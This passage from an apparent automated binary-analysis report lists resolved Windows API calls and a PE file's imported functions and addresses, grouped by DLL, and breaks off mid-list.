3206. "sspicli.dll.LsaUnregisterPolicyChangeNotification",
3207. "userenv.dll.UnregisterGPNotification",
3208. "gpapi.dll.UnregisterGPNotificationInternal",
3209. "wersvc.dll.ServiceMain",
3210. "wersvc.dll.SvchostPushServiceGlobals",
3211. "advapi32.dll.RegGetValueW",
3212. "faultrep.dll.WerpInitiateCrashReporting",
3213. "wer.dll.WerpCreateMachineStore",
3214. "shell32.dll.SHGetFolderPathEx",
3215. "ole32.dll.StringFromGUID2",
3216. "profapi.dll.#104",
3217. "userenv.dll.CreateEnvironmentBlock",
3218. "sechost.dll.ConvertSidToStringSidW",
3219. "sspicli.dll.GetUserNameExW",
3220. "userenv.dll.DestroyEnvironmentBlock",
3221. "imm32.dll.ImmDisableIME",
3222. "psapi.dll.GetModuleFileNameExW",
3223. "version.dll.GetFileVersionInfoSizeW",
3224. "version.dll.GetFileVersionInfoW",
3225. "version.dll.VerQueryValueW",
3226. "wer.dll.WerpCreateIntegratorReportId",
3227. "wer.dll.WerReportCreate",
3228. "advapi32.dll.OpenProcessToken",
3229. "wer.dll.WerpSetIntegratorReportId",
3230. "wer.dll.WerReportSetParameter",
3231. "dbgeng.dll.DebugCreate",
3232. "ntdll.dll.CsrGetProcessId",
3233. "ntdll.dll.DbgBreakPoint",
3234. "ntdll.dll.DbgPrint",
3235. "ntdll.dll.DbgPrompt",
3236. "ntdll.dll.DbgUiConvertStateChangeStructure",
3237. "ntdll.dll.DbgUiGetThreadDebugObject",
3238. "ntdll.dll.DbgUiIssueRemoteBreakin",
3239. "ntdll.dll.DbgUiSetThreadDebugObject",
3240. "ntdll.dll.NtAllocateVirtualMemory",
3241. "ntdll.dll.NtClose",
3242. "ntdll.dll.NtCreateDebugObject",
3243. "ntdll.dll.NtCreateFile",
3244. "ntdll.dll.NtDebugActiveProcess",
3245. "ntdll.dll.NtDebugContinue",
3246. "ntdll.dll.NtFreeVirtualMemory",
3247. "ntdll.dll.NtOpenProcess",
3248. "ntdll.dll.NtOpenThread",
3249. "ntdll.dll.NtQueryInformationProcess",
3250. "ntdll.dll.NtQueryInformationThread",
3251. "ntdll.dll.NtQueryMutant",
3252. "ntdll.dll.NtQueryObject",
3253. "ntdll.dll.NtQuerySystemInformation",
3254. "ntdll.dll.NtRemoveProcessDebug",
3255. "ntdll.dll.NtResumeThread",
3256. "ntdll.dll.NtSetInformationDebugObject",
3257. "ntdll.dll.NtSetInformationProcess",
3258. "ntdll.dll.NtSystemDebugControl",
3259. "ntdll.dll.NtWaitForDebugEvent",
3260. "ntdll.dll.RtlAnsiStringToUnicodeString",
3261. "ntdll.dll.RtlCreateProcessParameters",
3262. "ntdll.dll.RtlCreateUserProcess",
3263. "ntdll.dll.RtlDestroyProcessParameters",
3264. "ntdll.dll.RtlDosPathNameToNtPathName_U",
3265. "ntdll.dll.RtlFindMessage",
3266. "ntdll.dll.RtlFreeHeap",
3267. "ntdll.dll.RtlFreeUnicodeString",
3268. "ntdll.dll.RtlGetFunctionTableListHead",
3269. "ntdll.dll.RtlGetUnloadEventTrace",
3270. "ntdll.dll.RtlGetUnloadEventTraceEx",
3271. "ntdll.dll.RtlInitAnsiString",
3272. "ntdll.dll.RtlInitUnicodeString",
3273. "ntdll.dll.RtlTryEnterCriticalSection",
3274. "ntdll.dll.RtlUnicodeStringToAnsiString",
3275. "ntdll.dll.NtOpenProcessToken",
3276. "ntdll.dll.NtOpenThreadToken",
3277. "ntdll.dll.NtQueryInformationToken",
3278. "kernel32.dll.CloseProfileUserMapping",
3279. "kernel32.dll.DebugActiveProcessStop",
3280. "kernel32.dll.DebugBreak",
3281. "kernel32.dll.DebugBreakProcess",
3282. "kernel32.dll.DebugSetProcessKillOnExit",
3283. "kernel32.dll.Module32First",
3284. "kernel32.dll.Module32FirstW",
3285. "kernel32.dll.Module32Next",
3286. "kernel32.dll.Module32NextW",
3287. "kernel32.dll.OpenThread",
3288. "kernel32.dll.Process32First",
3289. "kernel32.dll.Process32Next",
3290. "kernel32.dll.ProcessIdToSessionId",
3291. "kernel32.dll.SetProcessShutdownParameters",
3292. "kernel32.dll.Thread32First",
3293. "kernel32.dll.Thread32Next",
3294. "kernel32.dll.DuplicateHandle",
3295. "kernel32.dll.Wow64GetThreadSelectorEntry",
3296. "advapi32.dll.CloseServiceHandle",
3297. "advapi32.dll.ControlService",
3298. "advapi32.dll.CreateServiceA",
3299. "advapi32.dll.CreateServiceW",
3300. "advapi32.dll.DeleteService",
3301. "advapi32.dll.EnumServicesStatusExA",
3302. "advapi32.dll.EnumServicesStatusExW",
3303. "advapi32.dll.GetEventLogInformation",
3304. "advapi32.dll.GetTokenInformation",
3305. "advapi32.dll.OpenSCManagerA",
3306. "advapi32.dll.OpenSCManagerW",
3307. "advapi32.dll.OpenServiceA",
3308. "advapi32.dll.OpenServiceW",
3309. "advapi32.dll.StartServiceA",
3310. "advapi32.dll.StartServiceW",
3311. "advapi32.dll.GetSidSubAuthority",
3312. "advapi32.dll.GetSidSubAuthorityCount",
3313. "version.dll.GetFileVersionInfoSizeExW",
3314. "version.dll.GetFileVersionInfoExW",
3315. "dbghelp.dll.WinDbgExtensionDllInit",
3316. "dbghelp.dll.ExtensionApiVersion",
3317. "wer.dll.WerpSetDynamicParameter",
3318. "wer.dll.WerReportAddDump",
3319. "wer.dll.WerpSetCallBack",
3320. "wer.dll.WerReportSetUIOption",
3321. "wer.dll.WerpAddRegisteredDataToReport",
3322. "wer.dll.WerReportSubmit",
3323. "user32.dll.LoadStringW",
3324. "advapi32.dll.RegSetValueExW",
3325. "advapi32.dll.FreeSid",
3326. "sensapi.dll.IsNetworkAlive",
3327. "rpcrt4.dll.RpcBindingFromStringBindingW",
3328. "rpcrt4.dll.RpcBindingSetAuthInfoExW",
3329. "rpcrt4.dll.NdrClientCall3",
3330. "user32.dll.CharUpperW",
3331. "wer.dll.WerpAddAppCompatData",
3332. "apphelp.dll.SdbGetFileAttributes",
3333. "apphelp.dll.SdbFormatAttribute",
3334. "apphelp.dll.SdbFreeFileAttributes",
3335. "cryptsp.dll.CryptAcquireContextW",
3336. "cryptsp.dll.CryptGetHashParam",
3337. "dbghelp.dll.MiniDumpWriteDump",
3338. "kernel32.dll.GetLongPathNameA",
3339. "kernel32.dll.GetLongPathNameW",
3340. "kernel32.dll.GetProcessTimes",
3341. "advapi32.dll.RegOpenKeyExA",
3342. "advapi32.dll.RegQueryValueExA",
3343. "powrprof.dll.CallNtPowerInformation"
3344. ]
3345.  
3346. [*] Static Analysis: {
3347. "pe": {
3348. "peid_signatures": null,
3349. "imports": [
3350. {
3351. "imports": [
3352. {
3353. "name": "WSACleanup",
3354. "address": "0x48f7c8"
3355. },
3356. {
3357. "name": "socket",
3358. "address": "0x48f7cc"
3359. },
3360. {
3361. "name": "inet_ntoa",
3362. "address": "0x48f7d0"
3363. },
3364. {
3365. "name": "setsockopt",
3366. "address": "0x48f7d4"
3367. },
3368. {
3369. "name": "ntohs",
3370. "address": "0x48f7d8"
3371. },
3372. {
3373. "name": "recvfrom",
3374. "address": "0x48f7dc"
3375. },
3376. {
3377. "name": "ioctlsocket",
3378. "address": "0x48f7e0"
3379. },
3380. {
3381. "name": "htons",
3382. "address": "0x48f7e4"
3383. },
3384. {
3385. "name": "WSAStartup",
3386. "address": "0x48f7e8"
3387. },
3388. {
3389. "name": "__WSAFDIsSet",
3390. "address": "0x48f7ec"
3391. },
3392. {
3393. "name": "select",
3394. "address": "0x48f7f0"
3395. },
3396. {
3397. "name": "accept",
3398. "address": "0x48f7f4"
3399. },
3400. {
3401. "name": "listen",
3402. "address": "0x48f7f8"
3403. },
3404. {
3405. "name": "bind",
3406. "address": "0x48f7fc"
3407. },
3408. {
3409. "name": "closesocket",
3410. "address": "0x48f800"
3411. },
3412. {
3413. "name": "WSAGetLastError",
3414. "address": "0x48f804"
3415. },
3416. {
3417. "name": "recv",
3418. "address": "0x48f808"
3419. },
3420. {
3421. "name": "sendto",
3422. "address": "0x48f80c"
3423. },
3424. {
3425. "name": "send",
3426. "address": "0x48f810"
3427. },
3428. {
3429. "name": "inet_addr",
3430. "address": "0x48f814"
3431. },
3432. {
3433. "name": "gethostbyname",
3434. "address": "0x48f818"
3435. },
3436. {
3437. "name": "gethostname",
3438. "address": "0x48f81c"
3439. },
3440. {
3441. "name": "connect",
3442. "address": "0x48f820"
3443. }
3444. ],
3445. "dll": "WSOCK32.dll"
3446. },
3447. {
3448. "imports": [
3449. {
3450. "name": "GetFileVersionInfoW",
3451. "address": "0x48f76c"
3452. },
3453. {
3454. "name": "GetFileVersionInfoSizeW",
3455. "address": "0x48f770"
3456. },
3457. {
3458. "name": "VerQueryValueW",
3459. "address": "0x48f774"
3460. }
3461. ],
3462. "dll": "VERSION.dll"
3463. },
3464. {
3465. "imports": [
3466. {
3467. "name": "timeGetTime",
3468. "address": "0x48f7b8"
3469. },
3470. {
3471. "name": "waveOutSetVolume",
3472. "address": "0x48f7bc"
3473. },
3474. {
3475. "name": "mciSendStringW",
3476. "address": "0x48f7c0"
3477. }
3478. ],
3479. "dll": "WINMM.dll"
3480. },
3481. {
3482. "imports": [
3483. {
3484. "name": "ImageList_ReplaceIcon",
3485. "address": "0x48f088"
3486. },
3487. {
3488. "name": "ImageList_Destroy",
3489. "address": "0x48f08c"
3490. },
3491. {
3492. "name": "ImageList_Remove",
3493. "address": "0x48f090"
3494. },
3495. {
3496. "name": "ImageList_SetDragCursorImage",
3497. "address": "0x48f094"
3498. },
3499. {
3500. "name": "ImageList_BeginDrag",
3501. "address": "0x48f098"
3502. },
3503. {
3504. "name": "ImageList_DragEnter",
3505. "address": "0x48f09c"
3506. },
3507. {
3508. "name": "ImageList_DragLeave",
3509. "address": "0x48f0a0"
3510. },
3511. {
3512. "name": "ImageList_EndDrag",
3513. "address": "0x48f0a4"
3514. },
3515. {
3516. "name": "ImageList_DragMove",
3517. "address": "0x48f0a8"
3518. },
3519. {
3520. "name": "InitCommonControlsEx",
3521. "address": "0x48f0ac"
3522. },
3523. {
3524. "name": "ImageList_Create",
3525. "address": "0x48f0b0"
3526. }
3527. ],
3528. "dll": "COMCTL32.dll"
3529. },
3530. {
3531. "imports": [
3532. {
3533. "name": "WNetUseConnectionW",
3534. "address": "0x48f3f8"
3535. },
3536. {
3537. "name": "WNetCancelConnection2W",
3538. "address": "0x48f3fc"
3539. },
3540. {
3541. "name": "WNetGetConnectionW",
3542. "address": "0x48f400"
3543. },
3544. {
3545. "name": "WNetAddConnection2W",
3546. "address": "0x48f404"
3547. }
3548. ],
3549. "dll": "MPR.dll"
3550. },
3551. {
3552. "imports": [
3553. {
3554. "name": "InternetQueryDataAvailable",
3555. "address": "0x48f77c"
3556. },
3557. {
3558. "name": "InternetCloseHandle",
3559. "address": "0x48f780"
3560. },
3561. {
3562. "name": "InternetOpenW",
3563. "address": "0x48f784"
3564. },
3565. {
3566. "name": "InternetSetOptionW",
3567. "address": "0x48f788"
3568. },
3569. {
3570. "name": "InternetCrackUrlW",
3571. "address": "0x48f78c"
3572. },
3573. {
3574. "name": "HttpQueryInfoW",
3575. "address": "0x48f790"
3576. },
3577. {
3578. "name": "InternetQueryOptionW",
3579. "address": "0x48f794"
3580. },
3581. {
3582. "name": "HttpOpenRequestW",
3583. "address": "0x48f798"
3584. },
3585. {
3586. "name": "HttpSendRequestW",
3587. "address": "0x48f79c"
3588. },
3589. {
3590. "name": "FtpOpenFileW",
3591. "address": "0x48f7a0"
3592. },
3593. {
3594. "name": "FtpGetFileSize",
3595. "address": "0x48f7a4"
3596. },
3597. {
3598. "name": "InternetOpenUrlW",
3599. "address": "0x48f7a8"
3600. },
3601. {
3602. "name": "InternetReadFile",
3603. "address": "0x48f7ac"
3604. },
3605. {
3606. "name": "InternetConnectW",
3607. "address": "0x48f7b0"
3608. }
3609. ],
3610. "dll": "WININET.dll"
3611. },
3612. {
3613. "imports": [
3614. {
3615. "name": "GetProcessMemoryInfo",
3616. "address": "0x48f484"
3617. }
3618. ],
3619. "dll": "PSAPI.DLL"
3620. },
3621. {
3622. "imports": [
3623. {
3624. "name": "IcmpCreateFile",
3625. "address": "0x48f154"
3626. },
3627. {
3628. "name": "IcmpCloseHandle",
3629. "address": "0x48f158"
3630. },
3631. {
3632. "name": "IcmpSendEcho",
3633. "address": "0x48f15c"
3634. }
3635. ],
3636. "dll": "IPHLPAPI.DLL"
3637. },
3638. {
3639. "imports": [
3640. {
3641. "name": "DestroyEnvironmentBlock",
3642. "address": "0x48f750"
3643. },
3644. {
3645. "name": "UnloadUserProfile",
3646. "address": "0x48f754"
3647. },
3648. {
3649. "name": "CreateEnvironmentBlock",
3650. "address": "0x48f758"
3651. },
3652. {
3653. "name": "LoadUserProfileW",
3654. "address": "0x48f75c"
3655. }
3656. ],
3657. "dll": "USERENV.dll"
3658. },
3659. {
3660. "imports": [
3661. {
3662. "name": "IsThemeActive",
3663. "address": "0x48f764"
3664. }
3665. ],
3666. "dll": "UxTheme.dll"
3667. },
3668. {
3669. "imports": [
3670. {
3671. "name": "DuplicateHandle",
3672. "address": "0x48f164"
3673. },
3674. {
3675. "name": "CreateThread",
3676. "address": "0x48f168"
3677. },
3678. {
3679. "name": "WaitForSingleObject",
3680. "address": "0x48f16c"
3681. },
3682. {
3683. "name": "HeapAlloc",
3684. "address": "0x48f170"
3685. },
3686. {
3687. "name": "GetProcessHeap",
3688. "address": "0x48f174"
3689. },
3690. {
3691. "name": "HeapFree",
3692. "address": "0x48f178"
3693. },
3694. {
3695. "name": "Sleep",
3696. "address": "0x48f17c"
3697. },
3698. {
3699. "name": "GetCurrentThreadId",
3700. "address": "0x48f180"
3701. },
3702. {
3703. "name": "MultiByteToWideChar",
3704. "address": "0x48f184"
3705. },
3706. {
3707. "name": "MulDiv",
3708. "address": "0x48f188"
3709. },
3710. {
3711. "name": "GetVersionExW",
3712. "address": "0x48f18c"
3713. },
3714. {
3715. "name": "IsWow64Process",
3716. "address": "0x48f190"
3717. },
3718. {
3719. "name": "GetSystemInfo",
3720. "address": "0x48f194"
3721. },
3722. {
3723. "name": "FreeLibrary",
3724. "address": "0x48f198"
3725. },
3726. {
3727. "name": "LoadLibraryA",
3728. "address": "0x48f19c"
3729. },
3730. {
3731. "name": "GetProcAddress",
3732. "address": "0x48f1a0"
3733. },
3734. {
3735. "name": "SetErrorMode",
3736. "address": "0x48f1a4"
3737. },
3738. {
3739. "name": "GetModuleFileNameW",
3740. "address": "0x48f1a8"
3741. },
3742. {
3743. "name": "WideCharToMultiByte",
3744. "address": "0x48f1ac"
3745. },
3746. {
3747. "name": "lstrcpyW",
3748. "address": "0x48f1b0"
3749. },
3750. {
3751. "name": "lstrlenW",
3752. "address": "0x48f1b4"
3753. },
3754. {
3755. "name": "GetModuleHandleW",
3756. "address": "0x48f1b8"
3757. },
3758. {
3759. "name": "QueryPerformanceCounter",
3760. "address": "0x48f1bc"
3761. },
3762. {
3763. "name": "VirtualFreeEx",
3764. "address": "0x48f1c0"
3765. },
3766. {
3767. "name": "OpenProcess",
3768. "address": "0x48f1c4"
3769. },
3770. {
3771. "name": "VirtualAllocEx",
3772. "address": "0x48f1c8"
3773. },
3774. {
3775. "name": "WriteProcessMemory",
3776. "address": "0x48f1cc"
3777. },
3778. {
3779. "name": "ReadProcessMemory",
3780. "address": "0x48f1d0"
3781. },
3782. {
3783. "name": "CreateFileW",
3784. "address": "0x48f1d4"
3785. },
3786. {
3787. "name": "SetFilePointerEx",
3788. "address": "0x48f1d8"
3789. },
3790. {
3791. "name": "SetEndOfFile",
3792. "address": "0x48f1dc"
3793. },
3794. {
3795. "name": "ReadFile",
3796. "address": "0x48f1e0"
3797. },
3798. {
3799. "name": "WriteFile",
3800. "address": "0x48f1e4"
3801. },
3802. {
3803. "name": "FlushFileBuffers",
3804. "address": "0x48f1e8"
3805. },
3806. {
3807. "name": "TerminateProcess",
3808. "address": "0x48f1ec"
3809. },
3810. {
3811. "name": "CreateToolhelp32Snapshot",
3812. "address": "0x48f1f0"
3813. },
3814. {
3815. "name": "Process32FirstW",
3816. "address": "0x48f1f4"
3817. },
3818. {
3819. "name": "Process32NextW",
3820. "address": "0x48f1f8"
3821. },
3822. {
3823. "name": "SetFileTime",
3824. "address": "0x48f1fc"
3825. },
3826. {
3827. "name": "GetFileAttributesW",
3828. "address": "0x48f200"
3829. },
3830. {
3831. "name": "FindFirstFileW",
3832. "address": "0x48f204"
3833. },
3834. {
3835. "name": "SetCurrentDirectoryW",
3836. "address": "0x48f208"
3837. },
3838. {
3839. "name": "GetLongPathNameW",
3840. "address": "0x48f20c"
3841. },
3842. {
3843. "name": "GetShortPathNameW",
3844. "address": "0x48f210"
3845. },
3846. {
3847. "name": "DeleteFileW",
3848. "address": "0x48f214"
3849. },
3850. {
3851. "name": "FindNextFileW",
3852. "address": "0x48f218"
3853. },
3854. {
3855. "name": "CopyFileExW",
3856. "address": "0x48f21c"
3857. },
3858. {
3859. "name": "MoveFileW",
3860. "address": "0x48f220"
3861. },
3862. {
3863. "name": "CreateDirectoryW",
3864. "address": "0x48f224"
3865. },
3866. {
3867. "name": "RemoveDirectoryW",
3868. "address": "0x48f228"
3869. },
3870. {
3871. "name": "SetSystemPowerState",
3872. "address": "0x48f22c"
3873. },
3874. {
3875. "name": "QueryPerformanceFrequency",
3876. "address": "0x48f230"
3877. },
3878. {
3879. "name": "FindResourceW",
3880. "address": "0x48f234"
3881. },
3882. {
3883. "name": "LoadResource",
3884. "address": "0x48f238"
3885. },
3886. {
3887. "name": "LockResource",
3888. "address": "0x48f23c"
3889. },
3890. {
3891. "name": "SizeofResource",
3892. "address": "0x48f240"
3893. },
3894. {
3895. "name": "EnumResourceNamesW",
3896. "address": "0x48f244"
3897. },
3898. {
3899. "name": "OutputDebugStringW",
3900. "address": "0x48f248"
3901. },
3902. {
3903. "name": "GetTempPathW",
3904. "address": "0x48f24c"
3905. },
3906. {
3907. "name": "GetTempFileNameW",
3908. "address": "0x48f250"
3909. },
3910. {
3911. "name": "DeviceIoControl",
3912. "address": "0x48f254"
3913. },
3914. {
3915. "name": "GetLocalTime",
3916. "address": "0x48f258"
3917. },
3918. {
3919. "name": "CompareStringW",
3920. "address": "0x48f25c"
3921. },
3922. {
3923. "name": "GetCurrentProcess",
3924. "address": "0x48f260"
3925. },
3926. {
3927. "name": "EnterCriticalSection",
3928. "address": "0x48f264"
3929. },
3930. {
3931. "name": "LeaveCriticalSection",
3932. "address": "0x48f268"
3933. },
3934. {
3935. "name": "GetStdHandle",
3936. "address": "0x48f26c"
3937. },
3938. {
3939. "name": "CreatePipe",
3940. "address": "0x48f270"
3941. },
3942. {
3943. "name": "InterlockedExchange",
3944. "address": "0x48f274"
3945. },
3946. {
3947. "name": "TerminateThread",
3948. "address": "0x48f278"
3949. },
3950. {
3951. "name": "LoadLibraryExW",
3952. "address": "0x48f27c"
3953. },
3954. {
3955. "name": "FindResourceExW",
3956. "address": "0x48f280"
3957. },
3958. {
3959. "name": "CopyFileW",
3960. "address": "0x48f284"
3961. },
3962. {
3963. "name": "VirtualFree",
3964. "address": "0x48f288"
3965. },
3966. {
3967. "name": "FormatMessageW",
3968. "address": "0x48f28c"
3969. },
3970. {
3971. "name": "GetExitCodeProcess",
3972. "address": "0x48f290"
3973. },
3974. {
3975. "name": "GetPrivateProfileStringW",
3976. "address": "0x48f294"
3977. },
3978. {
3979. "name": "WritePrivateProfileStringW",
3980. "address": "0x48f298"
3981. },
3982. {
3983. "name": "GetPrivateProfileSectionW",
3984. "address": "0x48f29c"
3985. },
3986. {
3987. "name": "WritePrivateProfileSectionW",
3988. "address": "0x48f2a0"
3989. },
3990. {
3991. "name": "GetPrivateProfileSectionNamesW",
3992. "address": "0x48f2a4"
3993. },
3994. {
3995. "name": "FileTimeToLocalFileTime",
3996. "address": "0x48f2a8"
3997. },
3998. {
3999. "name": "FileTimeToSystemTime",
4000. "address": "0x48f2ac"
4001. },
4002. {
4003. "name": "SystemTimeToFileTime",
4004. "address": "0x48f2b0"
4005. },
4006. {
4007. "name": "LocalFileTimeToFileTime",
4008. "address": "0x48f2b4"
4009. },
4010. {
4011. "name": "GetDriveTypeW",
4012. "address": "0x48f2b8"
4013. },
4014. {
4015. "name": "GetDiskFreeSpaceExW",
4016. "address": "0x48f2bc"
4017. },
4018. {
4019. "name": "GetDiskFreeSpaceW",
4020. "address": "0x48f2c0"
4021. },
4022. {
4023. "name": "GetVolumeInformationW",
4024. "address": "0x48f2c4"
4025. },
4026. {
4027. "name": "SetVolumeLabelW",
4028. "address": "0x48f2c8"
4029. },
4030. {
4031. "name": "CreateHardLinkW",
4032. "address": "0x48f2cc"
4033. },
4034. {
4035. "name": "SetFileAttributesW",
4036. "address": "0x48f2d0"
4037. },
4038. {
4039. "name": "CreateEventW",
4040. "address": "0x48f2d4"
4041. },
4042. {
4043. "name": "SetEvent",
4044. "address": "0x48f2d8"
4045. },
4046. {
4047. "name": "GetEnvironmentVariableW",
4048. "address": "0x48f2dc"
4049. },
4050. {
4051. "name": "SetEnvironmentVariableW",
4052. "address": "0x48f2e0"
4053. },
4054. {
4055. "name": "GlobalLock",
4056. "address": "0x48f2e4"
4057. },
4058. {
4059. "name": "GlobalUnlock",
4060. "address": "0x48f2e8"
4061. },
4062. {
4063. "name": "GlobalAlloc",
4064. "address": "0x48f2ec"
4065. },
4066. {
4067. "name": "GetFileSize",
4068. "address": "0x48f2f0"
4069. },
4070. {
4071. "name": "GlobalFree",
4072. "address": "0x48f2f4"
4073. },
4074. {
4075. "name": "GlobalMemoryStatusEx",
4076. "address": "0x48f2f8"
4077. },
4078. {
4079. "name": "Beep",
4080. "address": "0x48f2fc"
4081. },
4082. {
4083. "name": "GetSystemDirectoryW",
4084. "address": "0x48f300"
4085. },
4086. {
4087. "name": "HeapReAlloc",
4088. "address": "0x48f304"
4089. },
4090. {
4091. "name": "HeapSize",
4092. "address": "0x48f308"
4093. },
4094. {
4095. "name": "GetComputerNameW",
4096. "address": "0x48f30c"
4097. },
4098. {
4099. "name": "GetWindowsDirectoryW",
4100. "address": "0x48f310"
4101. },
4102. {
4103. "name": "GetCurrentProcessId",
4104. "address": "0x48f314"
4105. },
4106. {
4107. "name": "GetProcessIoCounters",
4108. "address": "0x48f318"
4109. },
4110. {
4111. "name": "CreateProcessW",
4112. "address": "0x48f31c"
4113. },
4114. {
4115. "name": "GetProcessId",
4116. "address": "0x48f320"
4117. },
4118. {
4119. "name": "SetPriorityClass",
4120. "address": "0x48f324"
4121. },
4122. {
4123. "name": "LoadLibraryW",
4124. "address": "0x48f328"
4125. },
4126. {
4127. "name": "VirtualAlloc",
4128. "address": "0x48f32c"
4129. },
4130. {
4131. "name": "IsDebuggerPresent",
4132. "address": "0x48f330"
4133. },
4134. {
4135. "name": "GetCurrentDirectoryW",
4136. "address": "0x48f334"
4137. },
4138. {
4139. "name": "lstrcmpiW",
4140. "address": "0x48f338"
4141. },
4142. {
4143. "name": "DecodePointer",
4144. "address": "0x48f33c"
4145. },
4146. {
4147. "name": "GetLastError",
4148. "address": "0x48f340"
4149. },
4150. {
4151. "name": "RaiseException",
4152. "address": "0x48f344"
4153. },
4154. {
4155. "name": "InitializeCriticalSectionAndSpinCount",
4156. "address": "0x48f348"
4157. },
4158. {
4159. "name": "DeleteCriticalSection",
4160. "address": "0x48f34c"
4161. },
4162. {
4163. "name": "InterlockedDecrement",
4164. "address": "0x48f350"
4165. },
4166. {
4167. "name": "InterlockedIncrement",
4168. "address": "0x48f354"
4169. },
4170. {
4171. "name": "GetCurrentThread",
4172. "address": "0x48f358"
4173. },
4174. {
4175. "name": "CloseHandle",
4176. "address": "0x48f35c"
4177. },
4178. {
4179. "name": "GetFullPathNameW",
4180. "address": "0x48f360"
4181. },
4182. {
4183. "name": "EncodePointer",
4184. "address": "0x48f364"
4185. },
4186. {
4187. "name": "ExitProcess",
4188. "address": "0x48f368"
4189. },
4190. {
4191. "name": "GetModuleHandleExW",
4192. "address": "0x48f36c"
4193. },
4194. {
4195. "name": "ExitThread",
4196. "address": "0x48f370"
4197. },
4198. {
4199. "name": "GetSystemTimeAsFileTime",
4200. "address": "0x48f374"
4201. },
4202. {
4203. "name": "ResumeThread",
4204. "address": "0x48f378"
4205. },
4206. {
4207. "name": "GetCommandLineW",
4208. "address": "0x48f37c"
4209. },
4210. {
4211. "name": "IsProcessorFeaturePresent",
4212. "address": "0x48f380"
4213. },
4214. {
4215. "name": "IsValidCodePage",
4216. "address": "0x48f384"
4217. },
4218. {
4219. "name": "GetACP",
4220. "address": "0x48f388"
4221. },
4222. {
4223. "name": "GetOEMCP",
4224. "address": "0x48f38c"
4225. },
4226. {
4227. "name": "GetCPInfo",
4228. "address": "0x48f390"
4229. },
4230. {
4231. "name": "SetLastError",
4232. "address": "0x48f394"
4233. },
4234. {
4235. "name": "UnhandledExceptionFilter",
4236. "address": "0x48f398"
4237. },
4238. {
4239. "name": "SetUnhandledExceptionFilter",
4240. "address": "0x48f39c"
4241. },
4242. {
4243. "name": "TlsAlloc",
4244. "address": "0x48f3a0"
4245. },
4246. {
4247. "name": "TlsGetValue",
4248. "address": "0x48f3a4"
4249. },
4250. {
4251. "name": "TlsSetValue",
4252. "address": "0x48f3a8"
4253. },
4254. {
4255. "name": "TlsFree",
4256. "address": "0x48f3ac"
4257. },
4258. {
4259. "name": "GetStartupInfoW",
4260. "address": "0x48f3b0"
4261. },
4262. {
4263. "name": "GetStringTypeW",
4264. "address": "0x48f3b4"
4265. },
4266. {
4267. "name": "SetStdHandle",
4268. "address": "0x48f3b8"
4269. },
4270. {
4271. "name": "GetFileType",
4272. "address": "0x48f3bc"
4273. },
4274. {
4275. "name": "GetConsoleCP",
4276. "address": "0x48f3c0"
4277. },
4278. {
4279. "name": "GetConsoleMode",
4280. "address": "0x48f3c4"
4281. },
4282. {
4283. "name": "RtlUnwind",
4284. "address": "0x48f3c8"
4285. },
4286. {
4287. "name": "ReadConsoleW",
4288. "address": "0x48f3cc"
4289. },
4290. {
4291. "name": "GetTimeZoneInformation",
4292. "address": "0x48f3d0"
4293. },
4294. {
4295. "name": "GetDateFormatW",
4296. "address": "0x48f3d4"
4297. },
4298. {
4299. "name": "GetTimeFormatW",
4300. "address": "0x48f3d8"
4301. },
4302. {
4303. "name": "LCMapStringW",
4304. "address": "0x48f3dc"
4305. },
4306. {
4307. "name": "GetEnvironmentStringsW",
4308. "address": "0x48f3e0"
4309. },
4310. {
4311. "name": "FreeEnvironmentStringsW",
4312. "address": "0x48f3e4"
4313. },
4314. {
4315. "name": "WriteConsoleW",
4316. "address": "0x48f3e8"
4317. },
4318. {
4319. "name": "FindClose",
4320. "address": "0x48f3ec"
4321. },
4322. {
4323. "name": "SetEnvironmentVariableA",
4324. "address": "0x48f3f0"
4325. }
4326. ],
4327. "dll": "KERNEL32.dll"
4328. },
4329. {
4330. "imports": [
4331. {
4332. "name": "AdjustWindowRectEx",
4333. "address": "0x48f4cc"
4334. },
4335. {
4336. "name": "CopyImage",
4337. "address": "0x48f4d0"
4338. },
4339. {
4340. "name": "SetWindowPos",
4341. "address": "0x48f4d4"
4342. },
4343. {
4344. "name": "GetCursorInfo",
4345. "address": "0x48f4d8"
4346. },
4347. {
4348. "name": "RegisterHotKey",
4349. "address": "0x48f4dc"
4350. },
4351. {
4352. "name": "ClientToScreen",
4353. "address": "0x48f4e0"
4354. },
4355. {
4356. "name": "GetKeyboardLayoutNameW",
4357. "address": "0x48f4e4"
4358. },
4359. {
4360. "name": "IsCharAlphaW",
4361. "address": "0x48f4e8"
4362. },
4363. {
4364. "name": "IsCharAlphaNumericW",
4365. "address": "0x48f4ec"
4366. },
4367. {
4368. "name": "IsCharLowerW",
4369. "address": "0x48f4f0"
4370. },
4371. {
4372. "name": "IsCharUpperW",
4373. "address": "0x48f4f4"
4374. },
4375. {
4376. "name": "GetMenuStringW",
4377. "address": "0x48f4f8"
4378. },
4379. {
4380. "name": "GetSubMenu",
4381. "address": "0x48f4fc"
4382. },
4383. {
4384. "name": "GetCaretPos",
4385. "address": "0x48f500"
4386. },
4387. {
4388. "name": "IsZoomed",
4389. "address": "0x48f504"
4390. },
4391. {
4392. "name": "MonitorFromPoint",
4393. "address": "0x48f508"
4394. },
4395. {
4396. "name": "GetMonitorInfoW",
4397. "address": "0x48f50c"
4398. },
4399. {
4400. "name": "SetWindowLongW",
4401. "address": "0x48f510"
4402. },
4403. {
4404. "name": "SetLayeredWindowAttributes",
4405. "address": "0x48f514"
4406. },
4407. {
4408. "name": "FlashWindow",
4409. "address": "0x48f518"
4410. },
4411. {
4412. "name": "GetClassLongW",
4413. "address": "0x48f51c"
4414. },
4415. {
4416. "name": "TranslateAcceleratorW",
4417. "address": "0x48f520"
4418. },
4419. {
4420. "name": "IsDialogMessageW",
4421. "address": "0x48f524"
4422. },
4423. {
4424. "name": "GetSysColor",
4425. "address": "0x48f528"
4426. },
4427. {
4428. "name": "InflateRect",
4429. "address": "0x48f52c"
4430. },
4431. {
4432. "name": "DrawFocusRect",
4433. "address": "0x48f530"
4434. },
4435. {
4436. "name": "DrawTextW",
4437. "address": "0x48f534"
4438. },
4439. {
4440. "name": "FrameRect",
4441. "address": "0x48f538"
4442. },
4443. {
4444. "name": "DrawFrameControl",
4445. "address": "0x48f53c"
4446. },
4447. {
4448. "name": "FillRect",
4449. "address": "0x48f540"
4450. },
4451. {
4452. "name": "PtInRect",
4453. "address": "0x48f544"
4454. },
4455. {
4456. "name": "DestroyAcceleratorTable",
4457. "address": "0x48f548"
4458. },
4459. {
4460. "name": "CreateAcceleratorTableW",
4461. "address": "0x48f54c"
4462. },
4463. {
4464. "name": "SetCursor",
4465. "address": "0x48f550"
4466. },
4467. {
